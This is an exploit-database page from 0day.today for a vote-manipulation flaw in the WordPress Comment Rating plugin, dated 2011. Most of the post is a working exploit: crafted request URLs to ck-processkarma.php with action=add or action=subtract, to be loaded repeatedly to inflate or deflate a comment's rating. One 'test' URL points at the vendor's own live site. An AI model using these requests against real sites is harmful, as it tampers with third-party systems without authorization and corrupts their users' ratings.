[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress plugin Comment Rating Execution Vulnerability

Author
sasa1
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15600
Category
web applications
Date add
15-03-2011
Platform
php
# Exploit Title: Wordpress plugin Comment Rating more than once in url
# Date: 14-03-2011
# Author: sasa1
# mysite: www.dev-chat.com
# Vendor: http://wealthynetizen.com
# Download: http://downloads.wordpress.org/plugin/comment-rating.zip

##################################

Exploit 4 Comment Rating more than once


Enter the URL in the browser more than once


xxxx=comment number

for @@Thumb up@@

http://site.com/wp-content/plugins/comment-rating/ck-processkarma.php?id=xxxx&action=add&path=.

++++++++++++++ OR ++++++++++++++

for @@Thumb down@@

http://site.com/wp-content/plugins/comment-rating/ck-processkarma.php?id=xxxx&action=subtract&path=.




test>>>

http://wealthynetizen.com/wp-content/plugins/comment-rating/ck-processkarma.php?id=16905&action=add&path=.

##################################

Exploit by www.dev-chat.com


#  0day.today [2024-11-16]  #